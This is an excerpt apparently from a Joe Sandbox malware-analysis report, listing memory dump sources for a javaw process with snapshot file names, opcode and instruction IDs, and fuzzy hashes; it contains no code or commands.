                                                                                                                        • Instruction Fuzzy Hash: 6DF0C2B6D00A0AABDB248F65C1047CAFBB4BB88718F14421AC42C67710D378B465CBC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a999b90eff59fa21d5f652705539af576e00840ed0f5438aba595010e759ba3e
                                                                                                                        • Instruction ID: d8004f2fe0594ed816cb368024683f82c8bfb61c7fd51e2b34d6d1eaf8f9dcc6
                                                                                                                        • Opcode Fuzzy Hash: a999b90eff59fa21d5f652705539af576e00840ed0f5438aba595010e759ba3e
                                                                                                                        • Instruction Fuzzy Hash: 94F0C2B6D00A0AABDB248F65C1047CAFBB5BB88728F14421AC52C67710D378B465CBC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea0000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a012a9fb5cf5d9e1554885d89a3030425dd9bcc3e3bcfa4e280c99466c7885fc
                                                                                                                        • Instruction ID: e1838b9c855de8d5d159de9ab417dc0e6e68f1025a8d1a48f8e95107287e27d2
                                                                                                                        • Opcode Fuzzy Hash: a012a9fb5cf5d9e1554885d89a3030425dd9bcc3e3bcfa4e280c99466c7885fc
                                                                                                                        • Instruction Fuzzy Hash: DB2126BA5482569FDB358F188C503D9B7E5FB18314F21882EDECDEB710D3306A898B90